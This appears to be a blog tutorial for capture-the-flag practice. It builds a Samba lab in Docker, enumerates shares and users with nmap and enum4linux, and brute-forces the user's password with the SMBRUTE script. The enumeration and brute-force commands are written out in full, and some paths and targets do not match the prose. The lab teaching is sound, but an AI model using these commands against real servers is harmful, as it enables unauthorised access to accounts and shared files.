When doing ctf challenges we often come across servers with smb ports listening. And when we enumerate we find a user but no password. Then we have to do it the hard way and bruteforce samba with “smbrute“.
In this post I will do the following,
- Set up a samba lab using Docker,
- Enumerate the container for a user,
- Brute force the user using smbrute,
For this I will be using my BlackArch install and Docker running on a ubuntu system. You can follow along my post on how to install Archlinux with the BlackArch repos. However any modern Linux system will do the trick.
|Enumeration System (BlackArch Linux)||192.168.1.150|
|Samba system (alpine Docker)||192.168.1.195|
Enumeration System Setup
To set up the enumeration system we need a couple packages installed.
Install smbclient + cifs-utils
sudo apt-get install smbclient cifs-utils enum4linux
sudo pacman -S smbclient cifs-utils enum4linux
smbclient is needed so samba commands are available and it’s required to have cifs-utils installed so the enumeration system can mount up samba shares. The command enum4linux allows the scanning of SMB shares. Like the ones samba shares.
Samba Server Setup
For samba server I am going to use docker. So make sure docker is installed and started on your samba server.
sudo snap install docker sudo systemctl enable --now docker
Create a working directory and cd into it.
mkdir -p ~/docker/samba cd ~/docker/samba
Pull down the docker image for samba.
sudo docker pull pwntr/samba-alpine
Run the docker image
sudo docker run -d -it --network host --name samba -v $(pwd)/share/:/shared --rm pwntr/samba-alpine
Confirm the image is running
sudo docker ps
This samba server has a user called rio and you have to set the samba password. Run the following commands and set the password to be “letmein”.
sudo docker exec -it samba /bin/ash smbpasswd -a rio New SMB password: Retype new SMB password:
Enumerate A Samba Server
Before we can bruteforce anything we need to enumerate some details such as shares and users. A great tool to start with for this is nmap.
Running nmap against the host quickly shows use that porst 139 and 445 are listening and are smb ports. Using enum4linux we can enumerate even more. Lets get some information on whats shared.
enum4linux -S 192.168.1.195
Which produces the output,
Next we get the users that can be used.
enum4linux -U 192.168.1.195
The output of this gives us the user rio.
Now that we have a user “rio” an a share called “/data” we can move to the next step to bruteforce the server password for the user “rio”
What is smbrute? It’s a python script that uses smbclient to brute force guess the password of smb share if you have a username. It uses a file of usernames and a file of passwords to do it. But first lets get the SMBrute python scripts.
We can use “git” to clone the repository into a local folder. In this case i will put into a directory called /root/scripts
cd /root/scripts git clone https://github.com/NullByte007/SMBRUTE
Once cloned you can “cd” into the newly created SMBRUTE directory and run the script to get some help on it.
cd SMBRUTE/ python ./SMBRUTE.py
The scripts needs a number of options to run,
- -u, A users file. This is a text file with all the users we want to try.
- -p, A password file. This is a text file with all the passwords that will be tried against all the users.
- -t, Target, the ip or hostname of the smb system.
I have created two text files. /tmp/users.txt, which has the users we will try, in this case its only one user “rio”. And /opt/wordlist/fastrack.txt which is a password file with 222 of the most popular passwords. It can be grabed from github.
Lets give it a go.
python ./SMBRUTE.py \ -u /tmp/SMBRUTE/users \ -p /tmp/SMBRUTE/passwords \ -t localhost
I have posted the basics of this to youtube so you can get a more visual experience of what’s involved.
I hope you found this write up of some use. When doing CTF challenges I found that samba is something that pops up quite often and its well working memorizing all the tools required to enumerate. So learn to bruteforce samba with smbrute.
Any questions of comments leave below.